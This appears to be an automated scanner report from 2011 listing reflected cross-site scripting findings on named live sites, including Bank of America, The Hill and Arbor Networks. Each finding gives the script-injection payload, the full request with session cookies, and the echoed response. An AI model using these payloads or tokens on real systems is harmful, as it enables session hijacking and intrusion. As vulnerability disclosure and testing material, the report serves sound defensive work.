if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "wareseekercom"; t.adSpace = "ros66ae8<a>a5a81e35302"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/ Connection: close Content-Length: 73997
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 02:00:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 02:15:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/ Connection: close Content-Length: 76050
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/ Connection: close Content-Length: 74000
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'> ...[SNIP]...
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arbornetworks.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:10 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:53 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:54 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:37 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:29 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:44 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:59 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:00 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:13 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:58 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:20 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.
